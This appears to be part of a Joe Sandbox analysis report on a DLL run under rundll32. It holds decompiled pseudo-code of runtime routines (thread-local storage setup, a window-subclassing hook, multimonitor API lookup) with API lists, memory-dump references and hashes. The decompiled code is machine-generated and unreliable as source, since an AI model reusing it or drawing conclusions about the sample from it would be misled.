                                                                                                        								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
                                                                                                        								__eflags = _t21 - 0xffffffff;
                                                                                                        								 *0x10057d2c = _t21;
                                                                                                        								if(_t21 == 0xffffffff) {
                                                                                                        									goto L14;
                                                                                                        								} else {
                                                                                                        									_t42 = E1001E76E(1, 0x214);
                                                                                                        									__eflags = _t42;
                                                                                                        									if(_t42 == 0) {
                                                                                                        										goto L14;
                                                                                                        									} else {
                                                                                                        										_push(_t42);
                                                                                                        										_push( *0x10057d2c);
                                                                                                        										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
                                                                                                        										if(__eflags == 0) {
                                                                                                        											goto L14;
                                                                                                        										} else {
                                                                                                        											_push(0);
                                                                                                        											_push(_t42);
                                                                                                        											E1001BE42(_t30, _t37, _t42, __eflags);
                                                                                                        											_t26 = GetCurrentThreadId();
                                                                                                        											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                        											 *_t42 = _t26;
                                                                                                        											_t11 = 1;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return _t11;
                                                                                                        				} else {
                                                                                                        					E1001BE05();
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}
















                                                                                                        0x1001c11b
                                                                                                        0x1001c127
                                                                                                        0x1001c12b
                                                                                                        0x1001c14b
                                                                                                        0x1001c158
                                                                                                        0x1001c165
                                                                                                        0x1001c16a
                                                                                                        0x1001c16c
                                                                                                        0x1001c173
                                                                                                        0x1001c179
                                                                                                        0x1001c17e
                                                                                                        0x1001c196
                                                                                                        0x1001c19b
                                                                                                        0x1001c1a5
                                                                                                        0x1001c1af
                                                                                                        0x1001c1b5
                                                                                                        0x1001c180
                                                                                                        0x1001c180
                                                                                                        0x1001c187
                                                                                                        0x00000000
                                                                                                        0x1001c189
                                                                                                        0x1001c189
                                                                                                        0x1001c190
                                                                                                        0x00000000
                                                                                                        0x1001c192
                                                                                                        0x1001c192
                                                                                                        0x1001c194
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001c194
                                                                                                        0x1001c190
                                                                                                        0x1001c187
                                                                                                        0x1001c1ba
                                                                                                        0x1001c1c0
                                                                                                        0x1001c1c3
                                                                                                        0x1001c1c8
                                                                                                        0x1001c29a
                                                                                                        0x1001c29a
                                                                                                        0x1001c29a
                                                                                                        0x1001c1ce
                                                                                                        0x1001c1d5
                                                                                                        0x1001c1d7
                                                                                                        0x1001c1d9
                                                                                                        0x00000000
                                                                                                        0x1001c1df
                                                                                                        0x1001c1df
                                                                                                        0x1001c1f5
                                                                                                        0x1001c205
                                                                                                        0x1001c215
                                                                                                        0x1001c222
                                                                                                        0x1001c227
                                                                                                        0x1001c22c
                                                                                                        0x1001c22e
                                                                                                        0x1001c295
                                                                                                        0x1001c295
                                                                                                        0x00000000
                                                                                                        0x1001c230
                                                                                                        0x1001c230
                                                                                                        0x1001c241
                                                                                                        0x1001c243
                                                                                                        0x1001c246
                                                                                                        0x1001c24b
                                                                                                        0x00000000
                                                                                                        0x1001c24d
                                                                                                        0x1001c259
                                                                                                        0x1001c25b
                                                                                                        0x1001c25f
                                                                                                        0x00000000
                                                                                                        0x1001c261
                                                                                                        0x1001c261
                                                                                                        0x1001c262
                                                                                                        0x1001c276
                                                                                                        0x1001c278
                                                                                                        0x00000000
                                                                                                        0x1001c27a
                                                                                                        0x1001c27a
                                                                                                        0x1001c27c
                                                                                                        0x1001c27d
                                                                                                        0x1001c284
                                                                                                        0x1001c28a
                                                                                                        0x1001c28e
                                                                                                        0x1001c292
                                                                                                        0x1001c292
                                                                                                        0x1001c278
                                                                                                        0x1001c25f
                                                                                                        0x1001c24b
                                                                                                        0x1001c22e
                                                                                                        0x1001c1d9
                                                                                                        0x1001c29e
                                                                                                        0x1001c12d
                                                                                                        0x1001c12d
                                                                                                        0x1001c135
                                                                                                        0x1001c135

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
                                                                                                        • __mtterm.LIBCMT ref: 1001C12D
                                                                                                          • Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
                                                                                                          • Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001F,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
                                                                                                        • TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
                                                                                                        • __init_pointers.LIBCMT ref: 1001C1DF
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C1EA
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C1FA
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C20A
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C21A
                                                                                                        • __decode_pointer.LIBCMT ref: 1001C23B
                                                                                                        • __calloc_crt.LIBCMT ref: 1001C254
                                                                                                        • __decode_pointer.LIBCMT ref: 1001C26E
                                                                                                        • __initptd.LIBCMT ref: 1001C27D
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1001C284
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 2657569430-3819984048
                                                                                                        • Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                        • Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
                                                                                                        • Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                        • Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr _t54;
                                                                                                        				void* _t55;
                                                                                                        				signed int _t56;
                                                                                                        				void* _t59;
                                                                                                        				long _t60;
                                                                                                        				signed int _t64;
                                                                                                        				void* _t66;
                                                                                                        				short _t72;
                                                                                                        				signed int _t74;
                                                                                                        				signed int _t76;
                                                                                                        				long _t83;
                                                                                                        				signed int _t86;
                                                                                                        				signed short _t87;
                                                                                                        				signed int _t88;
                                                                                                        				int _t94;
                                                                                                        				void* _t106;
                                                                                                        				long* _t108;
                                                                                                        				long _t110;
                                                                                                        				signed int _t111;
                                                                                                        				CHAR* _t112;
                                                                                                        				intOrPtr _t113;
                                                                                                        				void* _t116;
                                                                                                        				void* _t119;
                                                                                                        				intOrPtr _t120;
                                                                                                        
                                                                                                        				_t119 = __eflags;
                                                                                                        				_t105 = __edi;
                                                                                                        				_push(0x148);
                                                                                                        				E10017C2A(E1002866E, __ebx, __edi, __esi);
                                                                                                        				_t110 =  *(_t116 + 0x10);
                                                                                                        				_t94 =  *(_t116 + 0xc);
                                                                                                        				_push(0x1000a0f5);
                                                                                                        				 *(_t116 - 0x120) = _t110;
                                                                                                        				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
                                                                                                        				_t120 = _t54;
                                                                                                        				_t97 = 0 | _t120 == 0x00000000;
                                                                                                        				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                                                                        				_t121 = _t120 == 0;
                                                                                                        				if(_t120 == 0) {
                                                                                                        					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
                                                                                                        				}
                                                                                                        				if( *(_t116 + 8) == 3) {
                                                                                                        					_t106 =  *_t110;
                                                                                                        					_t111 =  *(_t54 + 0x14);
                                                                                                        					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
                                                                                                        					__eflags = _t111;
                                                                                                        					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                        					 *(_t116 - 0x124) = _t56;
                                                                                                        					if(_t111 != 0) {
                                                                                                        						L7:
                                                                                                        						__eflags =  *0x1005acbc;
                                                                                                        						if( *0x1005acbc == 0) {
                                                                                                        							L12:
                                                                                                        							__eflags = _t111;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								__eflags =  *0x1005a8dc;
                                                                                                        								if( *0x1005a8dc != 0) {
                                                                                                        									L19:
                                                                                                        									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
                                                                                                        									if(__eflags != 0) {
                                                                                                        										L23:
                                                                                                        										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                        										__eflags = _t59;
                                                                                                        										 *(_t116 - 0x14) = _t59;
                                                                                                        										if(_t59 != 0) {
                                                                                                        											_t112 = "AfxOldWndProc423";
                                                                                                        											_t64 = GetPropA(_t94, _t112);
                                                                                                        											__eflags = _t64;
                                                                                                        											if(_t64 == 0) {
                                                                                                        												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                                                                        												_t66 = GetPropA(_t94, _t112);
                                                                                                        												__eflags = _t66 -  *(_t116 - 0x14);
                                                                                                        												if(_t66 ==  *(_t116 - 0x14)) {
                                                                                                        													GlobalAddAtomA(_t112);
                                                                                                        													SetWindowLongA(_t94, 0xfffffffc, E10011245);
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        										L27:
                                                                                                        										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                                                                        										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                                                                        										__eflags =  *(_t116 - 0x124);
                                                                                                        										_t110 = _t60;
                                                                                                        										if( *(_t116 - 0x124) != 0) {
                                                                                                        											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                                                                        											_t50 = _t105 + 0x28;
                                                                                                        											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                                                                        											__eflags =  *_t50;
                                                                                                        										}
                                                                                                        										goto L30;
                                                                                                        									}
                                                                                                        									goto L27;
                                                                                                        								}
                                                                                                        								_t113 = 0x30;
                                                                                                        								E100174D0(_t106, _t116 - 0x154, 0, _t113);
                                                                                                        								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                                                                        								_push(_t116 - 0x154);
                                                                                                        								_push("#32768");
                                                                                                        								_push(0);
                                                                                                        								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
                                                                                                        								__eflags = _t72;
                                                                                                        								 *0x1005a8dc = _t72;
                                                                                                        								if(_t72 == 0) {
                                                                                                        									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                                                                        									__eflags = _t74;
                                                                                                        									if(_t74 == 0) {
                                                                                                        										goto L23;
                                                                                                        									}
                                                                                                        									 *((char*)(_t116 - 0x19)) = 0;
                                                                                                        									_t76 = E100199C1(_t116 - 0x118, "#32768");
                                                                                                        									__eflags = _t76;
                                                                                                        									if(_t76 == 0) {
                                                                                                        										goto L27;
                                                                                                        									}
                                                                                                        									goto L23;
                                                                                                        								}
                                                                                                        								goto L19;
                                                                                                        							}
                                                                                                        							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                                                                        							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                                                                        							E1000FB9D(_t111, _t116, _t94);
                                                                                                        							 *((intOrPtr*)( *_t111 + 0x50))();
                                                                                                        							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                                                                        							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
                                                                                                        							__eflags = _t83 - E1001025C;
                                                                                                        							if(_t83 != E1001025C) {
                                                                                                        								 *_t108 = _t83;
                                                                                                        							}
                                                                                                        							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                        							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                                                                        							__eflags =  *(_t116 - 0x14);
                                                                                                        							if( *(_t116 - 0x14) != 0) {
                                                                                                        								_push( *(_t116 - 0x18));
                                                                                                        								_push(0);
                                                                                                        								E1000CEFC();
                                                                                                        							}
                                                                                                        							goto L27;
                                                                                                        						}
                                                                                                        						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                        						__eflags = _t86 & 0x00010000;
                                                                                                        						if((_t86 & 0x00010000) != 0) {
                                                                                                        							goto L27;
                                                                                                        						}
                                                                                                        						_t87 =  *(_t106 + 0x28);
                                                                                                        						__eflags = _t87 - 0xffff;
                                                                                                        						if(_t87 <= 0xffff) {
                                                                                                        							 *(_t116 - 0x18) = 0;
                                                                                                        							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                                                                        							_t87 = _t116 - 0x18;
                                                                                                        						}
                                                                                                        						_t88 = E1000A7E1(_t87, "ime");
                                                                                                        						__eflags = _t88;
                                                                                                        						_pop(_t97);
                                                                                                        						if(_t88 == 0) {
                                                                                                        							goto L27;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					}
                                                                                                        					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                                                                        					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                                                                        						goto L27;
                                                                                                        					}
                                                                                                        					__eflags = _t56;
                                                                                                        					if(_t56 != 0) {
                                                                                                        						goto L27;
                                                                                                        					}
                                                                                                        					goto L7;
                                                                                                        				} else {
                                                                                                        					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                                                                        					L30:
                                                                                                        					return E10017C74(_t94, _t105, _t110);
                                                                                                        				}
                                                                                                        			}



























                                                                                                        0x10011389
                                                                                                        0x10011389
                                                                                                        0x10011389
                                                                                                        0x10011393
                                                                                                        0x10011398
                                                                                                        0x1001139b
                                                                                                        0x1001139e
                                                                                                        0x100113a8
                                                                                                        0x100113ae
                                                                                                        0x100113b5
                                                                                                        0x100113b7
                                                                                                        0x100113ba
                                                                                                        0x100113c0
                                                                                                        0x100113c2
                                                                                                        0x100113c4
                                                                                                        0x100113c4
                                                                                                        0x100113cd
                                                                                                        0x100113e2
                                                                                                        0x100113e4
                                                                                                        0x100113e7
                                                                                                        0x100113ec
                                                                                                        0x100113ee
                                                                                                        0x100113f2
                                                                                                        0x100113f8
                                                                                                        0x1001140f
                                                                                                        0x1001140f
                                                                                                        0x10011416
                                                                                                        0x10011463
                                                                                                        0x10011463
                                                                                                        0x10011465
                                                                                                        0x100114cd
                                                                                                        0x100114d5
                                                                                                        0x10011511
                                                                                                        0x1001151d
                                                                                                        0x10011524
                                                                                                        0x10011556
                                                                                                        0x10011559
                                                                                                        0x1001155f
                                                                                                        0x10011561
                                                                                                        0x10011564
                                                                                                        0x1001156c
                                                                                                        0x10011573
                                                                                                        0x10011575
                                                                                                        0x10011577
                                                                                                        0x1001157e
                                                                                                        0x10011586
                                                                                                        0x10011588
                                                                                                        0x1001158b
                                                                                                        0x1001158e
                                                                                                        0x1001159c
                                                                                                        0x1001159c
                                                                                                        0x1001158b
                                                                                                        0x10011577
                                                                                                        0x100115a2
                                                                                                        0x100115a8
                                                                                                        0x100115b4
                                                                                                        0x100115ba
                                                                                                        0x100115c1
                                                                                                        0x100115c3
                                                                                                        0x100115c8
                                                                                                        0x100115ce
                                                                                                        0x100115ce
                                                                                                        0x100115ce
                                                                                                        0x100115ce
                                                                                                        0x00000000
                                                                                                        0x100115d2
                                                                                                        0x00000000
                                                                                                        0x10011526
                                                                                                        0x100114d9
                                                                                                        0x100114e4
                                                                                                        0x100114ef
                                                                                                        0x100114f5
                                                                                                        0x100114fb
                                                                                                        0x100114fc
                                                                                                        0x100114fe
                                                                                                        0x10011506
                                                                                                        0x10011509
                                                                                                        0x1001150f
                                                                                                        0x10011535
                                                                                                        0x1001153b
                                                                                                        0x1001153d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011547
                                                                                                        0x1001154b
                                                                                                        0x10011550
                                                                                                        0x10011554
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011554
                                                                                                        0x00000000
                                                                                                        0x1001150f
                                                                                                        0x1001146d
                                                                                                        0x10011472
                                                                                                        0x10011479
                                                                                                        0x10011482
                                                                                                        0x10011498
                                                                                                        0x1001149a
                                                                                                        0x100114a0
                                                                                                        0x100114a2
                                                                                                        0x100114a4
                                                                                                        0x100114a4
                                                                                                        0x100114ac
                                                                                                        0x100114b0
                                                                                                        0x100114b4
                                                                                                        0x100114b8
                                                                                                        0x100114be
                                                                                                        0x100114c1
                                                                                                        0x100114c3
                                                                                                        0x100114c3
                                                                                                        0x00000000
                                                                                                        0x100114b8
                                                                                                        0x1001141b
                                                                                                        0x10011421
                                                                                                        0x10011426
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001142c
                                                                                                        0x1001142f
                                                                                                        0x10011434
                                                                                                        0x10011441
                                                                                                        0x10011445
                                                                                                        0x1001144b
                                                                                                        0x1001144b
                                                                                                        0x10011454
                                                                                                        0x10011459
                                                                                                        0x1001145c
                                                                                                        0x1001145d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001145d
                                                                                                        0x100113fa
                                                                                                        0x10011401
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011407
                                                                                                        0x10011409
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100113cf
                                                                                                        0x100113d7
                                                                                                        0x100115d4
                                                                                                        0x100115d9
                                                                                                        0x100115d9

                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 10011393
                                                                                                          • Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F
                                                                                                        • CallNextHookEx.USER32 ref: 100113D7
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        • GetClassLongA.USER32 ref: 1001141B
                                                                                                        • GlobalGetAtomNameA.KERNEL32 ref: 10011445
                                                                                                        • SetWindowLongA.USER32(?,000000FC,Function_0001025C), ref: 1001149A
                                                                                                        • _memset.LIBCMT ref: 100114E4
                                                                                                        • GetClassLongA.USER32 ref: 10011514
                                                                                                        • GetClassNameA.USER32(?,?,00000100), ref: 10011535
                                                                                                        • GetWindowLongA.USER32 ref: 10011559
                                                                                                        • GetPropA.USER32 ref: 10011573
                                                                                                        • SetPropA.USER32 ref: 1001157E
                                                                                                        • GetPropA.USER32 ref: 10011586
                                                                                                        • GlobalAddAtomA.KERNEL32 ref: 1001158E
                                                                                                        • SetWindowLongA.USER32(?,000000FC,Function_00011245), ref: 1001159C
                                                                                                        • CallNextHookEx.USER32 ref: 100115B4
                                                                                                        • UnhookWindowsHookEx.USER32(?), ref: 100115C8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                        • String ID: #32768$AfxOldWndProc423$ime
                                                                                                        • API String ID: 1191297049-4034971020
                                                                                                        • Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                        • Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
                                                                                                        • Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                        • Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000D6C3() {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				struct HINSTANCE__* _t5;
                                                                                                        				_Unknown_base(*)()* _t6;
                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                        				_Unknown_base(*)()* _t8;
                                                                                                        				_Unknown_base(*)()* _t9;
                                                                                                        				_Unknown_base(*)()* _t10;
                                                                                                        				_Unknown_base(*)()* _t11;
                                                                                                        				_Unknown_base(*)()* _t12;
                                                                                                        				struct HINSTANCE__* _t18;
                                                                                                        				void* _t20;
                                                                                                        				intOrPtr _t23;
                                                                                                        				_Unknown_base(*)()* _t24;
                                                                                                        
                                                                                                        				_t23 =  *0x1005a76c; // 0x0
                                                                                                        				if(_t23 == 0) {
                                                                                                        					_push(_t20);
                                                                                                        					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
                                                                                                        					_t18 = GetModuleHandleA("USER32");
                                                                                                        					__eflags = _t18;
                                                                                                        					if(_t18 == 0) {
                                                                                                        						L12:
                                                                                                        						 *0x1005a750 = 0;
                                                                                                        						 *0x1005a754 = 0;
                                                                                                        						 *0x1005a758 = 0;
                                                                                                        						 *0x1005a75c = 0;
                                                                                                        						 *0x1005a760 = 0;
                                                                                                        						 *0x1005a764 = 0;
                                                                                                        						 *0x1005a768 = 0;
                                                                                                        						_t5 = 0;
                                                                                                        					} else {
                                                                                                        						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                        						__eflags = _t6;
                                                                                                        						 *0x1005a750 = _t6;
                                                                                                        						if(_t6 == 0) {
                                                                                                        							goto L12;
                                                                                                        						} else {
                                                                                                        							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                        							__eflags = _t7;
                                                                                                        							 *0x1005a754 = _t7;
                                                                                                        							if(_t7 == 0) {
                                                                                                        								goto L12;
                                                                                                        							} else {
                                                                                                        								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                        								__eflags = _t8;
                                                                                                        								 *0x1005a758 = _t8;
                                                                                                        								if(_t8 == 0) {
                                                                                                        									goto L12;
                                                                                                        								} else {
                                                                                                        									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                        									__eflags = _t9;
                                                                                                        									 *0x1005a75c = _t9;
                                                                                                        									if(_t9 == 0) {
                                                                                                        										goto L12;
                                                                                                        									} else {
                                                                                                        										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                        										__eflags = _t10;
                                                                                                        										 *0x1005a764 = _t10;
                                                                                                        										if(_t10 == 0) {
                                                                                                        											goto L12;
                                                                                                        										} else {
                                                                                                        											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                        											__eflags = _t11;
                                                                                                        											 *0x1005a760 = _t11;
                                                                                                        											if(_t11 == 0) {
                                                                                                        												goto L12;
                                                                                                        											} else {
                                                                                                        												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                        												__eflags = _t12;
                                                                                                        												 *0x1005a768 = _t12;
                                                                                                        												if(_t12 == 0) {
                                                                                                        													goto L12;
                                                                                                        												} else {
                                                                                                        													_t5 = 1;
                                                                                                        													__eflags = 1;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *0x1005a76c = 1;
                                                                                                        					return _t5;
                                                                                                        				} else {
                                                                                                        					_t24 =  *0x1005a760; // 0x0
                                                                                                        					return 0 | _t24 != 0x00000000;
                                                                                                        				}
                                                                                                        			}

















                                                                                                        0x1000d6c6
                                                                                                        0x1000d6cc
                                                                                                        0x1000d6db
                                                                                                        0x1000d6e7
                                                                                                        0x1000d6f2
                                                                                                        0x1000d6f4
                                                                                                        0x1000d6f6
                                                                                                        0x1000d78a
                                                                                                        0x1000d78a
                                                                                                        0x1000d790
                                                                                                        0x1000d796
                                                                                                        0x1000d79c
                                                                                                        0x1000d7a2
                                                                                                        0x1000d7a8
                                                                                                        0x1000d7ae
                                                                                                        0x1000d7b4
                                                                                                        0x1000d6fc
                                                                                                        0x1000d708
                                                                                                        0x1000d70a
                                                                                                        0x1000d70c
                                                                                                        0x1000d711
                                                                                                        0x00000000
                                                                                                        0x1000d713
                                                                                                        0x1000d719
                                                                                                        0x1000d71b
                                                                                                        0x1000d71d
                                                                                                        0x1000d722
                                                                                                        0x00000000
                                                                                                        0x1000d724
                                                                                                        0x1000d72a
                                                                                                        0x1000d72c
                                                                                                        0x1000d72e
                                                                                                        0x1000d733
                                                                                                        0x00000000
                                                                                                        0x1000d735
                                                                                                        0x1000d73b
                                                                                                        0x1000d73d
                                                                                                        0x1000d73f
                                                                                                        0x1000d744
                                                                                                        0x00000000
                                                                                                        0x1000d746
                                                                                                        0x1000d74c
                                                                                                        0x1000d74e
                                                                                                        0x1000d750
                                                                                                        0x1000d755
                                                                                                        0x00000000
                                                                                                        0x1000d757
                                                                                                        0x1000d75d
                                                                                                        0x1000d75f
                                                                                                        0x1000d761
                                                                                                        0x1000d766
                                                                                                        0x00000000
                                                                                                        0x1000d768
                                                                                                        0x1000d76e
                                                                                                        0x1000d770
                                                                                                        0x1000d772
                                                                                                        0x1000d777
                                                                                                        0x00000000
                                                                                                        0x1000d779
                                                                                                        0x1000d77b
                                                                                                        0x1000d77b
                                                                                                        0x1000d77b
                                                                                                        0x1000d777
                                                                                                        0x1000d766
                                                                                                        0x1000d755
                                                                                                        0x1000d744
                                                                                                        0x1000d733
                                                                                                        0x1000d722
                                                                                                        0x1000d711
                                                                                                        0x1000d77e
                                                                                                        0x1000d789
                                                                                                        0x1000d6ce
                                                                                                        0x1000d6d0
                                                                                                        0x1000d6da
                                                                                                        0x1000d6da

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,76925D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
